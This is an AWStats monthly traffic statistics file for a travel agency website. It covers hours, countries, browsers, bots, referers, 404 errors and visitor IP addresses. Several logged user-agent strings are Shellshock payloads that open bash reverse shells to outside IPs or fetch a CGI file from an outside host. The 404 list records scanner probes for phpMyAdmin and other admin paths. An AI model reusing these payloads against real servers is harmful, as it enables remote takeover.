AWSTATS DATA FILE 6.8 (build 1.910)
# If you remove this file, all statistics for date 201604 will be lost/reset.

# Position (offset in bytes) in this file of beginning of each section for
# direct I/O access. If you made changes somewhere in this file, you should
# also remove completely the MAP section (AWStats will rewrite it at next
# update).
BEGIN_MAP 28
POS_GENERAL 1915                
POS_TIME 2598                
POS_VISITOR 24940               
POS_DAY 39404               
POS_DOMAIN 3588                
POS_LOGIN 4341                
POS_ROBOT 4496                
POS_WORMS 5048                
POS_EMAILSENDER 5179                
POS_EMAILRECEIVER 5322                
POS_SESSION 40312               
POS_SIDER 40523               
POS_FILETYPES 5457                
POS_OS 5775                
POS_BROWSER 5900                
POS_SCREENSIZE 6374                
POS_UNKNOWNREFERER 6448                
POS_UNKNOWNREFERERBROWSER 8480                
POS_ORIGIN 9456                
POS_SEREFERRALS 9601                
POS_PAGEREFS 9785                
POS_SEARCHWORDS 11249               
POS_KEYWORDS 11430               
POS_MISC 2262                
POS_ERRORS 11510               
POS_CLUSTER 4197                
POS_SIDER_404 11665               
POS_PLUGIN_geoip_city_maxmind 22711               
END_MAP

# LastLine    = Date of last record processed - Last record line number in last log - Last record offset in last log - Last record signature value
# FirstTime   = Date of first visit for history file
# LastTime    = Date of last visit for history file
# LastUpdate  = Date of last update - Nb of parsed records - Nb of parsed old records - Nb of parsed new records - Nb of parsed corrupted - Nb of parsed dropped
# TotalVisits = Number of visits
# TotalUnique = Number of unique visitors
# MonthHostsKnown   = Number of hosts known
# MonthHostsUnKnown = Number of hosts unknown
BEGIN_GENERAL 8
LastLine 20160501005209 554 126579 10375708580307
FirstTime 20160401003847
LastTime 20160430180406
LastUpdate 20160501080007 554 0 552 1 0
TotalVisits 395                 
TotalUnique 310                 
MonthHostsKnown 0                   
MonthHostsUnknown 369                 
END_GENERAL

# Misc ID - Pages - Hits - Bandwidth
BEGIN_MISC 10
QuickTimeSupport 0 0 0
JavaEnabled 0 0 0
JavascriptDisabled 0 0 0
PDFSupport 0 0 0
WindowsMediaPlayerSupport 0 0 0
AddToFavourites 0 2 0
RealPlayerSupport 0 0 0
TotalMisc 0 0 0
DirectorSupport 0 0 0
FlashSupport 0 0 0
END_MISC

# Hour - Pages - Hits - Bandwidth - Not viewed Pages - Not viewed Hits - Not viewed Bandwidth
BEGIN_TIME 24
0 150 1288 211373035 137 228 13344915
1 205 1627 309296601 127 149 4343750
2 202 1781 342477495 129 229 17691890
3 189 1837 349720598 135 270 25032898
4 71 500 112475278 115 146 5364329
5 103 772 185034418 92 177 16023060
6 218 2330 494653790 173 259 14150182
7 104 955 195617272 118 200 17271104
8 94 805 91193801 107 164 7415340
9 213 2665 361576195 131 518 11953209
10 130 1366 136571202 137 177 11563497
11 102 977 173496049 146 188 10418965
12 44 381 78258283 146 163 3660733
13 27 207 35038119 104 136 5207089
14 22 213 44197181 94 108 4110707
15 33 378 31757806 90 149 4684199
16 26 228 34558013 119 215 17608409
17 10 70 11506939 101 128 4894768
18 31 163 37991498 100 134 4644880
19 20 82 15745112 149 182 5874008
20 34 237 38690640 111 135 4095012
21 19 150 34332161 99 128 4062705
22 20 152 29374132 111 137 4708360
23 40 271 43444851 128 197 15314499
END_TIME

# Domain - Pages - Hits - Bandwidth
# The 10 first Pages must be first (order not required for others)
BEGIN_DOMAIN 35
in 1725 17385 3021452108
us 178 814 132167554
unknown 75 453 94435522
cn 16 16 1029238
eu 15 80 18005333
br 14 196 42610257
ro 9 137 16392042
bh 9 44 5783754
ru 7 7 492107
fr 7 7 384418
ua 1 1 70301
tr 0 1 192351
ph 5 50 12717999
no 1 1 70301
kr 1 1 391
lv 1 1 70301
dk 1 1 70301
sa 1 25 4476917
co 5 48 12101495
th 7 63 14037865
hk 1 1 70301
ie 0 1 173876
cz 1 1 70301
by 3 24 5709512
de 5 5 353391
jp 5 10 471783
ch 1 1 70301
gb 1 1 70301
hu 3 3 140602
ca 0 1 167142
za 1 1 70301
ar 1 1 70301
nl 2 2 140602
nz 5 49 12226144
ae 0 3 2015056
END_DOMAIN

# Cluster ID - Pages - Hits - Bandwidth
BEGIN_CLUSTER 0
END_CLUSTER

# Login - Pages - Hits - Bandwidth - Last visit
# The 10 first Pages must be first (order not required for others)
BEGIN_LOGIN 0
END_LOGIN

# Robot ID - Hits - Bandwidth - Last visit - Hits on robots.txt
# The 10 first Hits must be first (order not required for others)
BEGIN_ROBOT 11
baiduspider 1481 48550307 20160430235412 0
googlebot 620 26490517 20160430161729 0
bot[+:,\.\;\/\\-] 186 23771234 20160429131825 0
mj12bot 119 6757372 20160430192905 0
yandex 82 5887834 20160428125554 0
no_user_agent 42 1753235 20160428214529 0
ia_archiver 6 372369 20160422201628 0
netcraft 3 70301 20160407032154 0
surveybot 2 140602 20160425175642 0
cfnetwork 1 70301 20160409004047 0
crawl 1 70301 20160403060210 0
END_ROBOT

# Worm ID - Hits - Bandwidth - Last visit
# The 5 first Hits must be first (order not required for others)
BEGIN_WORMS 0
END_WORMS

# EMail - Hits - Bandwidth - Last visit
# The 20 first Hits must be first (order not required for others)
BEGIN_EMAILSENDER 0
END_EMAILSENDER

# EMail - Hits - Bandwidth - Last visit
# The 20 first hits must be first (order not required for others)
BEGIN_EMAILRECEIVER 0
END_EMAILRECEIVER

# Files type - Hits - Bandwidth - Bandwidth without compression - Bandwidth after compression
BEGIN_FILETYPES 13
eot 37 694455 0 0
css 2413 54183905 0 0
png 9740 2932857254 0 0
ttf 230 32052720 0 0
woff 177 6297368 0 0
woff2 564 9893240 0 0
php 611 36728865 0 0
html 484 32946545 0 0
js 3195 99937667 0 0
jpg 1931 192699537 0 0
jpeg 49 28392 0 0
Unknown 3 1173 0 0
pngf 1 59348 0 0
END_FILETYPES

# OS ID - Hits
BEGIN_OS 8
winme 2
macosx 1132
winlong 2
winxp 297
win2003 11
winnt 12704
Unknown 255
linux 5032
END_OS

# Browser ID - Hits
BEGIN_BROWSER 31
firefox28.0 13
msie6.0 29
firefox20.0 2
firefox15.0 1
firefox44.0 158
msie6.01 1
opera 109
firefox21.0 17
firefox29.0 9
curl 7
firefox46.0 809
firefox12.0 73
firefox45.0 4168
firefox31.0 106
msie8.0 280
firefox6.0.2 4
firefox39.0 594
mozilla 273
firefox43.0 2
netscape5.0 5
msie7.0 24
firefox14.0.1 6
msie10.0 12
firefox41.0 1
firefox9.0.1 1
msie9.0 15
firefox27.0 1
firefox36.0 1359
Unknown 139
firefox11.0 2
safari 11215
END_BROWSER

# Screen size - Hits
BEGIN_SCREENSIZE 0
END_SCREENSIZE

# Unknown referer OS - Last visit date
BEGIN_UNKNOWNREFERER 26
SimplePie/1.3.1_(Feed_Parser;_http://simplepie.org;_Allow_like_Gecko)_Build/20160226060242 20160425035459
curl/7.29.0 20160414235820
Curl/PHP_5.5.9-1ubuntu4.14_(http://github.com/shuber/curl) 20160424204827
visionutils/0.2 20160424115244
()_{_:;_};_/bin/bash_-i_>&_/dev/tcp/41.231.112.3/16161_0<&1_2>&1_& 20160426223729
Go_http_package 20160428052609
Mojolicious_(Perl) 20160429135304
masscan/1.0_(https://github.com/robertdavidgraham/masscan) 20160425052824
semanticbot 20160430101340
Mozilla/5.0_(Windows_10;_WOW64;_rv:41.0)_Gecko/20100101_Firefox/41.0 20160415110607
Opera/9.80_(J2ME/MIDP;_Opera_Mini/4.5.40312/37.8233;_U;_gu)_Presto/2.12.423_Version/12.16 20160425122944
curl/7.35.0 20160410002316
Mozilla/5.0_zgrab/0.x 20160414105451
Mozilla/5.0_(compatible;__http://servernfo.com/) 20160401042004
WWW-Mechanize/1.73 20160420023646
curl/7.38.0 20160405025253
Mozilla/5.0_(compatible;_Dataprovider/6.92;__https://www.dataprovider.com/) 20160428201221
Mozilla/5.0_(compatible;_Google-Site-Verification/1.0) 20160422161041
www.probethenet.com_scanner 20160420002954
facebookexternalhit/1.1_(_http://www.facebook.com/externalhit_uatext.php) 20160424115238
()_{_:;_};_/bin/bash_-i_>&_/dev/tcp/144.168.45.117/16161_0<&1_2>&1_& 20160417190403
()_{_:;_};_/bin/sh_-c_'wget_http://closettransfer.com/umbrella.cgi_-O_/dev/null;wget1_http://closettransfer.com/umbrella.cgi_-O_/dev/null;curl_http://closettransfer.com/umbrella.cgi_-o_/dev/null;/usr/sfwbin/wget_http://closettransfer.com/umbrella.cgi;fetch_-/dev/null_http://closettransfer.com/umbrella.cgi' 20160429141352
Opera/9.80_(Series_60;_Opera_Mini/7.1.32444/37.8186;_U;_en)_Presto/2.12.423_Version/12.16 20160413143112
Mozilla/5.0_(compatible;_Nmap_Scripting_Engine;_http://nmap.org/book/nse.html) 20160418223117
BlackBerry9000/4.6.0.167_Profile/MIDP-2.0_Configuration/CLDC-1.1_VendorID/102_ips-agent 20160402085727
()_{_:;_};_/bin/bash_-i_>&_/dev/tcp/65.49.37.71/2311_0<&1_2>&1 20160422155330
END_UNKNOWNREFERER

# Unknown referer Browser - Last visit date
BEGIN_UNKNOWNREFERERBROWSER 14
SimplePie/1.3.1_(Feed_Parser;_http://simplepie.org;_Allow_like_Gecko)_Build/20160226060242 20160425035459
visionutils/0.2 20160424115244
()_{_:;_};_/bin/bash_-i_>&_/dev/tcp/41.231.112.3/16161_0<&1_2>&1_& 20160426223729
Go_http_package 20160428052609
Mojolicious_(Perl) 20160429135304
masscan/1.0_(https://github.com/robertdavidgraham/masscan) 20160425052824
semanticbot 20160430101340
www.probethenet.com_scanner 20160420002954
facebookexternalhit/1.1_(_http://www.facebook.com/externalhit_uatext.php) 20160424115238
()_{_:;_};_/bin/bash_-i_>&_/dev/tcp/144.168.45.117/16161_0<&1_2>&1_& 20160417190403
BlackBerry9000/4.6.0.167_Profile/MIDP-2.0_Configuration/CLDC-1.1_VendorID/102_ips-agent 20160402085727
Dalvik/2.1.0_(Linux;_U;_Android_5.1.1;_SM-N920G_Build/LMY47X) 20160430180406
WWW-Mechanize/1.73 20160420023646
()_{_:;_};_/bin/bash_-i_>&_/dev/tcp/65.49.37.71/2311_0<&1_2>&1 20160422155330
END_UNKNOWNREFERERBROWSER

# Origin - Pages - Hits 
BEGIN_ORIGIN 6
From0 402 504
From1 1 1
From2 60 80
From3 57 60
From4 1587 18790
From5 0 0
END_ORIGIN

# Search engine referers ID - Pages - Hits
BEGIN_SEREFERRALS 3
google 59 77
google_image 0 2
yahoo 1 1
END_SEREFERRALS

# External page referers - Pages - Hits
# The 10 first Pages must be first (order not required for others)
BEGIN_PAGEREFS 16
http://www.justdial.com/Pondicherry/Oozaaoo-Leisures-Private-Limited-%3Cnear%3E-Pillaitottam/0413PX413-X413-150409164028-E8A2_BZDET 13 13
http://top1-seo-service.com/try.php 12 12
http://www.justdial.com/Chennai/Oozaaoo-Leisures-Pvt-Ltd-%3Cnear%3E-Near-Indian-Bank-Adyar/044PXX44-XX44-150409160246-G4E8_BZDET 6 6
http://www.justdial.com/Coimbatore/Oozaaoo-Leisured-Private-Limited-%3Cnear%3E-Chinniampalayam/0422PX422-X422-150822163406-V9U3_BZDET 5 5
http://burger-imperia.com 4 4
http://t.justdial.com/Pondicherry/Oozaaoo-Leisures-Private-Limited-%3Cnear%3E-Pillaitottam/0413PX413-X413-150409164028-E8A2_BZDET 3 3
http://www.justdial.com/Chennai/OOZAAOO-LEISURES-PVT-LTD/044PXX44-XX44-150409160246-G4E8_BZDET 3 3
http://buttons-for-website.com 2 2
http://www.bing.com 2 2
http://www.justdial.com/Pondicherry/Oozaaoo-Leisures-Private-Limited-%3Cnear%3E-Iyyanar-Nagar-Kosapalayam/0413PX413-X413-150812134707-W2T3_BZDET 2 2
http://www.justdial.com/Pondicherry/Oozaaoo-Leisures-Pvt-Ltd-%3Cnear%3E-Kosapalayam/0413PX413-X413-150812123703-Y6Z5_BZDET 1 1
http://www.justdial.com/Chennai/Oozaaoo-Leisures-Pvt-Ltd-%3Cnear%3E-Adyar/044PXX44-XX44-150409160246-G4E8_BZDET 1 1
https://www.facebook.com 1 1
http://googleweblight.com 0 3
http://hundejo.com 1 1
http://t.justdial.com/Chennai/Tour-Packages-For-Delhi/ct-127575 1 1
END_PAGEREFS

# Search keyphrases - Number of search
# The 10 first number of search must be first (order not required for others)
BEGIN_SEARCHWORDS 2
oozaaoo+leisures 2
oozaaoo 1
END_SEARCHWORDS

# Search keywords - Number of search
# The 10 first number of search must be first (order not required for others)
BEGIN_KEYWORDS 2
oozaaoo 3
leisures 2
END_KEYWORDS

# Errors - Hits - Bandwidth
BEGIN_ERRORS 6
401 30 14910
302 4 376
206 543 118802350
400 8 1808
301 10 2310
404 1379 682381
END_ERRORS

# URL with 404 errors - Hits - Last URL referer
BEGIN_SIDER_404 241
//phpMyAdmin-2.10.2.0/scripts/setup.php 1 -
/admin/content/sitetree/ 1 -
/images/international/kenya.png 1 -
/wordpress/ 2 -
/images/header-bg.png 12 http://oozaaoo.com/css/style.css
/images/outbound_new/china.png 1 http://oozaaoo.com/international.php
/admin.php 4 -
//phpMyAdmin-2.9.0/scripts/setup.php 1 -
/dev/js/jquery.min.map 15 -
/images/explore-world/russia.jpg 3 http://oozaaoo.com/index.php
/images/outbound_new/malaysia.png 1 http://oozaaoo.com/international.php
/images/outbound_new/kenya.png 1 http://oozaaoo.com/international.php
http://www.baidu.com/cache/global/img/gs.gif 4 -
/images/outbound_new/athens.png 1 http://oozaaoo.com/international.php
/images/logo.png 13 http://oozaaoo.com/index.php
/images/footer-slider/footer4.png 3 http://oozaaoo.com/index.php
/images/outbound_new/morocco.png 1 http://oozaaoo.com/international.php
/js/Poof.. 1 -
/joomla/robots.txt 1 -
/js/s3slider.js 1 -
/images/outbound_new/syria.png 1 http://oozaaoo.com/international.php
/images/outbound_new/korea.png 1 http://oozaaoo.com/international.php
//phpMyAdmin3/scripts/setup.php 1 -
//MyAdmin/scripts/setup.php 2 -
/v2/login 1 -
/images/domestic/ooty.png 2 https://www.google.co.in
//phpMyAdmin-2.9.0-rc1/scripts/setup.php 1 -
/images/international/cambodia.png 1 -
/static/v2/js/bootstrap-datepicker.js 1 -
/images/outbound_new/bali.png 1 http://oozaaoo.com/international.php
/images/twitter.png 8 http://oozaaoo.com/css/style.css
/xmlrpc.php 5 -
//phpMyAdmin-2.8.2.3/scripts/setup.php 1 -
/images/outbound_new/glimpse.png 1 http://oozaaoo.com/international.php
/images/animation/2.png 3 http://oozaaoo.com/index.php
/images/outbound_new/paris.png 1 http://oozaaoo.com/international.php
/images/international/amsterdam.png 1 -
/images/outbound_new/dubai1.png 4 http://oozaaoo.com/dev/css/style.css
/dev/css/images/header-bg.png 1 http://oozaaoo.com/dev/css/style.css
/images/slider11.png 3 http://oozaaoo.com/index.php
//phpMyAdmin-3.0.0.0-all-languages/scripts/setup.php 1 -
/images/international/hongkong.jpg 1 -
/administrator/manifests/libraries/joomla.xml 4 -
//phpMyAdmin-2.9.1/scripts/setup.php 1 -
/dev/img/fav.png 29 -
/images/outbound_new/america.png 1 http://oozaaoo.com/international.php
/images/outbound_new/japan.png 1 http://oozaaoo.com/international.php
/static/v2/js/jquery.tipsy.js 1 -
/images/explore-world/kulumanali.jpg 3 http://oozaaoo.com/index.php
/images/outbound_new/egypt.png 1 http://oozaaoo.com/international.php
/static/v2/js/bootstrap-timepicker.js 2 -
/images/international/bangkok.png 1 -
/images/outbound_new/newzealand.png 1 http://oozaaoo.com/international.php
/Domestic-Flight-booking-terms/ 12 -
/wp-content/plugins/fluid_forms/file-upload/server/gae-go/app.yaml 1 -
/administrator/ 8 -
/aboutus/ 13 -
/v2/register 40 -
/ts.php 1 -
/images/footer-slider/footer2.png 3 http://oozaaoo.com/index.php
/images/outbound_new/tibet.png 1 http://oozaaoo.com/international.php
/images/outbound_new/ladakh.png 1 http://oozaaoo.com/international.php
/joomla/administrator/index.php 1 -
/wp-login.php 10 -
/images/international/srilanka.png 1 -
/dev/index.html 5 http://oozaaoo.com/dev/international.php
/images/outbound_new/philiphines.png 1 http://oozaaoo.com/international.php
//pma/scripts/setup.php 1 -
/images/international/seychelles.png 1 -
//phpMyAdmin-2.6.4-rc1/scripts/setup.php 1 -
/images/outbound_new/combadia.png 1 http://oozaaoo.com/international.php
//phpmyadmin/scripts/setup.php 1 -
/images/partner/srilanka.png 6 http://oozaaoo.com/index.php
//phpMyAdmin-2.8.2/scripts/setup.php 1 -
/images/partner/our-partner.png 3 http://oozaaoo.com/index.php
/v2/privacy/ 9 -
//phpMyAdmin-2.6.5/scripts/setup.php 1 -
/js/ui.resizable 1 -
/images/google-pluse.png 12 http://oozaaoo.com/css/style.css
/images/international/russia.png 2 -
/jcarousel.css 1 -
/images/outbound2.png 1 http://oozaaoo.com/international.php
/images/footer-big-couple.png 12 http://oozaaoo.com/css/style.css
/images/map-marker.png 24 http://oozaaoo.com/contact.php
/contactus/ 23 -
/images/outbound_new/kilimanjaro.png 1 http://oozaaoo.com/international.php
/images/outbound_new/dubai.png 1 http://oozaaoo.com/international.php
/index.html 45 -
/console/login/LoginForm.jsp 1 -
/images/outbound_new/italy.png 1 http://oozaaoo.com/international.php
/images/outbound_new/kuwait.png 1 http://oozaaoo.com/international.php
/license.txt 1 -
/images/outbound_new/singapore.png 3 -
/images/outbound_new/shangai.png 1 http://oozaaoo.com/international.php
//myadmin/scripts/setup.php 2 -
/images/outbound_new/bhutan.png 1 http://oozaaoo.com/international.php
/images/contact2.png 12 http://oozaaoo.com/contact.php
/images/international/kilimanjaro.png 2 -
/blog/administrator/index.php 1 -
/docs/funcspecs/3.jsp 1 http://65.74.153.170/docs/funcspecs/3.jsp
/js/action.js 2 http://oozaaoo.com/
/jpg/image.jpg 2 -
/images/footer-slider/footer3.png 3 http://oozaaoo.com/index.php
/privacy/ 12 -
/struts/utils.js 1 -
/images/slider12.png 3 http://oozaaoo.com/index.php
/International-Flight-booking-terms/ 12 -
/images/international/cyprus.png 1 -
/images/international/china.png 1 -
/images/international/bhutan.png 2 -
/administrator/index.php 6 http://oozaaoo.com/administrator/
/images/image_one_two.png 3 http://oozaaoo.com/index.php
/images/international/vietnam.png 2 -
/images/international/swiss.png 1 -
/images/outbound_new/turkey.png 1 http://oozaaoo.com/international.php
/readme.html 1 -
/images/slider14.png 5 http://oozaaoo.com/index.php
/images/outbound_new/uganda.png 1 http://oozaaoo.com/international.php
//administrator/components/com_joommyadmin/phpmyadmin/scripts/setup.php 1 -
/images/explore-world/gangtok.jpg 3 http://oozaaoo.com/index.php
/images/explore-world/darjeeling.jpg 3 http://oozaaoo.com/index.php
/images/outbound_new/seychelles.png 1 http://oozaaoo.com/international.php
/static/v2/js/filter.js 1 -
/images/contact1.png 12 http://oozaaoo.com/contact.php
/dev/images/domestic/trivandrum.png 14 http://oozaaoo.com/dev/domestic.php
/images/outbound_new/maldives.png 1 http://oozaaoo.com/international.php
/images/explore-world/seychelles.jpg 3 http://oozaaoo.com/index.php
/images/outbound_new/australia.png 1 http://oozaaoo.com/international.php
/images/international/dubai.png 1 -
/images/locate-us.png 12 http://oozaaoo.com/css/style.css
/robots.txt 394 -
/images/footer-slider/footer1.png 3 http://oozaaoo.com/index.php
/manager/ 1 -
/images/explore-world/europe.jpg 3 http://oozaaoo.com/index.php
//phpMyAdmin-2.9.0.2/scripts/setup.php 1 -
/static/v2/js/bootstrap.min.js 1 -
/images/partner/rocket.jpg 3 http://oozaaoo.com/index.php
/web-console/ServerInfo.jsp 1 -
/images/international/australia.png 1 -
/wp-content/plugins/revslider/js/rev_admin.js 1 -
/js/jquery-1.11.3.min.js 3 http://oozaaoo.com/
/images/international/mongolia.png 1 -
/wp-admin/ 4 http://oozaaoo.com/wp-login.php
/images/international/tibet.png 1 -
//php-my-admin/scripts/setup.php 1 -
/DEV/ 1 -
/home.html 1 -
http://www.baidu.com/robots.txt 1 -
/images/domestic/trivandrum.png 13 http://oozaaoo.com/domestic.php
/css/main.css 1 http://oozaaoo.com/
//phpMyAdmin-2.11.1-all-languages/scripts/setup.php 1 -
/images/outbound_new/swiss1.png 1 http://oozaaoo.com/css/style.css
/images/outbound_new/russia.png 1 http://oozaaoo.com/international.php
/static/v2/js/jquery-ui.min.js 1 -
/static/v2/js/bootstrap-slider.js 1 -
/images/animation/1.png 3 http://oozaaoo.com/index.php
/js/validate.min.map 2 -
/images/partner/fernzwood.png 3 http://oozaaoo.com/index.php
/images/outbound_new/cyprus.png 1 http://oozaaoo.com/international.php
/images/outbound_new/hongkong1.png 1 http://oozaaoo.com/css/style.css
/images/international/paris.png 1 -
/mybooking/ 78 -
/images/outbound_new/srilanka.png 1 http://oozaaoo.com/international.php
//admin/scripts/setup.php 1 -
/apple-touch-icon-120x120.png 1 -
/irj/portal 1 -
/v2/terms_and_condition/ 5 -
/contact-us.html 9 -
/images/outbound_new/poland.png 1 http://oozaaoo.com/international.php
/apple-touch-icon-120x120-precomposed.png 1 -
//web/scripts/setup.php 1 -
/a 1 -
/images/mobile-img.png 3 http://oozaaoo.com/index.php
/zecmd/zecmd.jsp 1 -
/register/ 5 -
/images/explore-world/italy.jpg 3 http://oozaaoo.com/index.php
/images/outbound3.png 1 http://oozaaoo.com/international.php
/admin/ 1 -
/images/partner/rapid.jpg 3 http://oozaaoo.com/index.php
/images/outbound_new/myannmar.png 1 http://oozaaoo.com/international.php
/img/fav.png 93 -
/images/animation/3.png 3 http://oozaaoo.com/index.php
//phpMyAdmin-2.9.0.1/scripts/setup.php 1 -
/apple-touch-icon.png 1 -
/images/international/bali.png 1 -
/images/outbound_new/turkey1.png 1 http://oozaaoo.com/css/style.css
//phpMyAdmin-2.11.0.0/scripts/setup.php 1 -
/images/image_one_mountain.png 3 http://oozaaoo.com/index.php
/images/outbound_new/swiss.png 1 http://oozaaoo.com/international.php
/user/password/reset/ 6 -
/phpmyadmin/scripts/setup.php 1 -
/redirect.php 1 -
//_phpmyadmin/scripts/setup.php 1 -
/blog/ 1 -
/wp/ 1 -
/muieblackcat 2 -
/dev/js/validate.min.map 32 -
/images/outbound_new/hongkong.png 1 http://oozaaoo.com/international.php
/images/outbound_new/amsterdam.png 1 http://oozaaoo.com/international.php
/terms-and-conditions/ 1 -
//phpMyAdmin-2.11.1.0/scripts/setup.php 1 -
//php/phpmyadmin/scripts/setup.php 1 -
//phpMyAdmin-2.11.1.2/scripts/setup.php 1 -
/static/v2/js/jquery.ui.slider.js 1 -
/images/outbound_new/mongolia.png 1 http://oozaaoo.com/international.php
/images/slider13.png 5 http://oozaaoo.com/index.php
//phpMyAdmin-3.0.1.0/scripts/setup.php 1 -
/images/mail-us.png 12 http://oozaaoo.com/css/style.css
//phpMyAdmin-2.11.1.1/scripts/setup.php 1 -
/phppath/php 1 -
/js/validate.min.js 2 http://oozaaoo.com/
/images/outbound_new/southafrica.png 1 http://oozaaoo.com/international.php
/CHANGELOG.txt 5 -
/blog/robots.txt 2 -
/images/outbound1.png 1 http://oozaaoo.com/international.php
/static/v2/js/nicescroll.js 1 -
/images/outbound_new/bangok.png 1 http://oozaaoo.com/international.php
/images/outbound_new/vietnam.png 4 http://oozaaoo.com/dev/international.php
/images/boat.png 3 http://oozaaoo.com/index.php
/static/v2/js/custom.js 1 -
/js/jquery.min.map 8 -
/images/outbound_new/hongkong6.png 1 http://oozaaoo.com/international.php
/js/1.11.4 1 -
/images/outbound_new/paris1.png 1 http://oozaaoo.com/css/style.css
/images/outbound_new/bali1.png 1 http://oozaaoo.com/css/style.css
/images/linkedin.png 8 http://oozaaoo.com/css/style.css
/static/v2/js/jquery-1.9.1.js 1 -
/v2 1 -
/admin 5 -
/images/outbound_new/israel.png 1 http://oozaaoo.com/international.php
/skin/error.php 1 -
//phpMyAdmin-2.6.1-pl2/scripts/setup.php 1 -
/images/outbound_new/southafrica1.png 1 http://oozaaoo.com/css/style.css
/manager/html 6 -
http://37.48.94.6/proxychecker/check.cgi 1 http://www.google.com/search
//phpMyAdmin/scripts/setup.php 2 -
/images/call-us.png 12 http://oozaaoo.com/css/style.css
/images/international/maldives.png 1 -
/images/facebook.png 12 http://oozaaoo.com/css/style.css
/static/v2/img/aboutus.jpg 1 -
/joomla.xml 4 -
END_SIDER_404

# Plugin key - Pages - Hits - Bandwidth - Last access
BEGIN_PLUGIN_geoip_city_maxmind 76
unknown 0 12231 0 0
in_madras_25 0 3603 0 0
in_new%20delhi_07 0 891 0 0
in_mumbai_16 0 240 0 0
us_mountain%20view_ca 0 227 0 0
in_calcutta_28 0 204 0 0
in_kochi_13 0 186 0 0
in_coimbatore_25 0 183 0 0
in_pondicherry_22 0 179 0 0
in_bangalore_19 0 168 0 0
in_hyderabad_02 0 160 0 0
de_kiez_12 0 1 0 0
us_sterling_va 0 7 0 0
us_fullerton_ca 0 1 0 0
us_louisville_ky 0 1 0 0
us_san%20diego_ca 0 1 0 0
us_ann%20arbor_mi 0 8 0 0
ca_mississauga_on 0 1 0 0
us_palo%20alto_ca 0 42 0 0
us_sunnyvale_ca 0 3 0 0
br_são%20paulo_27 0 49 0 0
in_erode_25 0 78 0 0
no_trondheim_16 0 1 0 0
us_washington_dc 0 11 0 0
in_pune_16 0 53 0 0
us_mount%20laurel_nj 0 1 0 0
us_chicago_il 0 1 0 0
us_kansas%20city_mo 0 4 0 0
fr_lançon_b8 0 1 0 0
br_fortaleza_06 0 26 0 0
br_pelotas_23 0 40 0 0
in_surat_09 0 62 0 0
us_new%20york_ny 0 1 0 0
in_varanasi_36 0 48 0 0
us_englewood_co 0 4 0 0
ru_irkutsk_20 0 1 0 0
us_guilderland_ny 0 2 0 0
us_woodbridge_nj 0 10 0 0
us_lenexa_ks 0 2 0 0
nz_christchurch_e9 0 49 0 0
co_bogotá_33 0 48 0 0
cn_beijing_22 0 6 0 0
us_reno_nv 0 1 0 0
us_flowery%20branch_ga 0 56 0 0
gb_cambridge_c3 0 1 0 0
us_simsbury_ct 0 3 0 0
ru_saint%20petersburg_66 0 1 0 0
us_norwalk_ct 0 63 0 0
cn_chaoyang_19 0 3 0 0
us_philadelphia_pa 0 1 0 0
in_nagercoil_25 0 122 0 0
ae_dubai_03 0 2 0 0
us_los%20angeles_ca 0 1 0 0
br_porto%20alegre_23 0 1 0 0
us_mcallen_tx 0 8 0 0
br_brasília_07 0 17 0 0
in_ahmadabad_09 0 2 0 0
us_jamaica%20plain_ma 0 70 0 0
de_berlin_16 0 3 0 0
fr_paris_a8 0 5 0 0
dk_oksbøl_21 0 1 0 0
hk_cheung%20sha%20wan_00 0 1 0 0
us_virginia%20beach_va 0 2 0 0
sa_riyadh_10 0 25 0 0
in_thiruvananthapuram_13 0 43 0 0
us_seattle_wa 0 25 0 0
in_lucknow_36 0 8 0 0
br_goiânia_29 0 15 0 0
kr_seoul_11 0 1 0 0
us_white%20plains_ny 0 12 0 0
us_salt%20lake%20city_ut 0 1 0 0
us_wilmington_de 0 4 0 0
nl_amsterdam_07 0 1 0 0
ph_sampaloc_53 0 50 0 0
ru_moscow_48 0 1 0 0
us_milpitas_ca 0 50 0 0
END_PLUGIN_geoip_city_maxmind

# Host - Pages - Hits - Bandwidth - Last visit date - [Start date of last visit] - [Last page of last visit]
# [Start date of last visit] and [Last page of last visit] are saved only if session is not finished
# The 10 first Hits must be first (order not required for others)
BEGIN_VISITOR 369
14.102.43.11 645 7127 987259157 20160430015213
122.165.111.97 144 1850 349161232 20160430035023
182.73.124.6 41 406 86134979 20160427071812
117.218.45.253 27 174 6446488 20160430032042
123.136.215.45 23 153 29862961 20160414015503
122.174.8.27 21 226 30815596 20160427071821
124.124.203.101 21 186 26865734 20160412081757
1.39.20.22 17 130 227654 20160410080135
103.43.202.83 16 145 31362431 20160425112451
59.99.239.202 14 102 9663602 20160401004513
188.244.154.30 1 1 70301 20160417180727
198.58.118.93 2 2 140602 20160408014425
128.232.110.28 1 1 70301 20160415032955
66.249.84.193 1 1 70301 20160406223440
157.55.39.121 0 2 7126 
117.216.8.229 9 122 26242990 20160404110502
185.35.62.11 1 1 70301 20160406163202
72.14.199.125 1 1 53 20160422161041
14.194.215.243 2 2 140602 20160427033158
122.174.98.113 12 139 29852139 20160406024948
173.252.74.104 0 2 347752 
99.6.206.221 5 56 5480363 20160428200238
120.132.50.135 3 3 210903 20160421054801
138.201.16.75 1 1 70301 20160424143054
187.23.137.27 1 40 11479618 20160412213918
54.183.183.64 1 1 70301 20160426070010
204.12.196.235 1 1 70301 20160410034938
45.55.133.237 1 13 508461 20160429093806
107.167.108.193 0 2 1970986 
74.91.17.178 1 1 70301 20160418074514
5.39.222.159 4 4 257750 20160427032551
117.201.9.52 8 109 22750593 20160401091415
106.206.139.243 8 49 10615573 20160420070947
66.249.80.105 2 2 140602 20160410232153
5.36.108.84 8 73 17534794 20160410103308
118.102.206.122 7 51 12606444 20160404064614
173.252.102.112 0 3 1185026 
106.208.181.255 6 37 11630496 20160425063241
208.42.251.123 4 4 136862 20160421071654
173.252.102.118 0 4 985933 
210.72.142.101 1 1 391 20160422155330
66.102.8.249 2 19 5494240 20160424204830
50.116.16.218 2 2 140602 20160421073950
171.4.10.164 7 63 14037865 20160418133057
211.123.206.75 1 1 70301 20160428051753
189.43.53.100 2 22 6738905 20160404180321
13.92.249.52 5 49 12530360 20160408184419
69.30.202.226 1 1 70301 20160418092133
66.220.156.117 0 1 491150 
122.164.78.132 6 58 14358387 20160428031232
187.53.189.115 1 17 702012 20160401064340
67.207.157.225 2 2 140602 20160404105416
54.206.99.179 1 1 70301 20160412054731
98.139.248.80 2 2 140602 20160406074042
175.44.4.171 1 1 42747 20160419050058
106.76.17.53 1 1 70301 20160405194940
74.91.18.45 1 1 70301 20160423090809
52.39.72.152 1 1 70301 20160420023646
74.91.17.180 1 1 70301 20160423164237
106.208.118.189 11 118 28554494 20160424065844
94.102.51.38 1 1 70301 20160409063921
52.90.80.176 1 1 70301 20160424204827
